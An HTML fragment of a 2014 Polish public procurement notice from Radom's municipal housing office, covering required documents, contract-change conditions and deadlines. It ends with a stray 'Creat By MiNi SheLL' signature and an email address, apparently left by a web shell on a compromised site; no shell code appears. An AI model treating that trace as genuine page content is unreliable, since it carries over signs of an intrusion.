<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający nie wymaga złożenia informacji ani dowodów dotyczących innych robót budowlanych niż roboty potwierdzające spełnienie warunku udziału w postępowaniu dotyczące posiadania doświadczenia i wiedzy tj. warunku określonego w Rozdziale VI pkt 1.1. b)SIWZ.
Dowodami, o których mowa powyżej są dokumenty, o których mowa w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 lutego 2013 r w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. 
Jeżeli wykonawca spełnia warunek polegając na wiedzy i doświadczeniu innego podmiotu zobowiązany jest załączyć pisemne zobowiązanie podmiotu, z którego jednoznacznie będzie wynikało, że podmiot ten będzie uczestniczył w realizacji przedmiotu zamówienia, oraz  zobowiązany jest przedłożyć dokumenty wymienione w Rozdziale VII pkt 2 dotyczące tych podmiotów, z których zasobów korzysta dla potwierdzenia spełniania warunku udziału w postępowaniu.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W przypadku powoływania się przez Wykonawcę na potencjał innych podmiotów przy wykazywaniu spełniania  warunków, o których mowa w art. 22 ust. 1 ustawy, Wykonawca  zobowiązany  jest  do :
- przedstawienia pisemnego zobowiązania tych podmiotów, do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Treść zobowiązania podmiotu trzeciego powinna określać: 
zakresu dostępnych wykonawcy zasobów innego podmiotu,
sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,  zakresu i okresu udziału innego podmiotu przy wykonywaniu .
2. W przypadku złożenia oferty wspólnej należy załączyć  upoważnienie dla Pełnomocnika do reprezentowania podmiotów działających wspólnie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez osoby upoważnione do reprezentowania tych podmiotów (zgodnie z dokumentem określającym status prawny Wykonawcy lub dołączonym do oferty pełnomocnictwem).
3.W przypadku ustanowienia pełnomocnika do reprezentacji w postępowaniu do oferty należy załączyć  aktualne pełnomocnictwo rodzajowe lub szczegółowe wskazujące zakres pełnomocnictwa dla ustanowionego pełnomocnika. Pełnomocnictwo winno być złożone w oryginale lub w formie notarialnie poświadczonej kopii</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian umowy w drodze pisemnego aneksu pod rygorem nieważności zgodnie z art. 144 ust. 1 ustawy w następujących przypadkach:
a)	Rozszerzenia lub zmiany zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, 
b)	Zmiany podwykonawcy, na potencjał,  którego Wykonawca powołał się przy wykazaniu spełnienia warunków, o których mowa w art. 22 Ust. 1 przy czym Wykonawca jest zobowiązany wykazać, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o zamówienie 
c)	Zmiany kierownika robót wskazanego w przez Wykonawcę - zmiana możliwa jest tylko w przypadku zaistnienia okoliczności, na które Wykonawca nie ma wpływu (np. śmierć, choroba uniemożliwiająca mu wykonywanie pracy itp.)
d)	Zmiany ceny brutto umowy - w przypadku zmiany stawki podatku VAT (przy zachowaniu dotychczasowej wartości netto) jeżeli nastąpi zmiana przepisów ustawy o podatku od towarów 
i usług i podatku akcyzowym
e)	Zmiany terminu realizacji umowy (skrócenie) w przypadku jeżeli wystąpią nieprzewidziane okoliczności wynikające z powodu siły wyższej lub działania osób trzecich uniemożliwiającego wykonywanie prac. Za wystąpienie tych okoliczności uznane będą w szczególności wszelkie wydarzenia mające wpływ na realizację umowy, znajdujące się poza realną kontrolą Wykonawcy i Zamawiającego, a których nie można było wcześniej przewidzieć, a w szczególności wojny, mobilizacja, akty prawne , decyzje, postanowienia, nakazy itp. organów władzy publicznej lub administracji publicznej uniemożliwiające wykonanie umowy w całości lub w części w przewidzianym terminie i inne okoliczności niezależne od stron, których nie można było przewidzieć i na które strony nie mają wpływu;
f)	Zmiany terminu obowiązywania umowy poprzez jego skrócenie - w przypadku wykorzystania w całości kwoty, o której mowa w §6 ust 2 umowy,
g)   Zmiany terminu obowiązywania umowy poprzez jego wydłużenie - w przypadku nie  wykorzystania        w całości kwoty, o której mowa w §6 ust 2 umowy - do momentu jej wykorzystania ( nie dłużej jednak niż przez okres lat 2 od dnia zawarcia umowy i nie dłużej niż do wykorzystania w całości kwoty, o której mowa w §6 ust 2 umowy )
h)   Zmiany sposobu realizacji umowy - w przypadkach spowodowanych przyczynami zewnętrznymi niezależnymi od Zamawiającego i Wykonawcy skutkującymi niemożliwością wykonania usługi na warunkach określonych w umowie ( w szczególności spowodowane zmianą obowiązującego prawa w zakresie przedmiotu zamówienia tj. decyzjami, postanowieniami, nakazami itp. organów władzy publicznej lub administracji publicznej uniemożliwiającymi wykonanie umowy w całości lub w części  - w zakresie wskazanym w decyzjach tych organów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mzlradom.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI ZARZĄD LOKALAMI w RADOMIU parter, sekretariat
26-600 ul. Garbarska 55/57.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2014 godzina 10:00, miejsce: MIEJSKI ZARZĄD LOKALAMI w RADOMIU 
Sekretariat parter
ul. Garbarska 55/57   26-600 Radom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com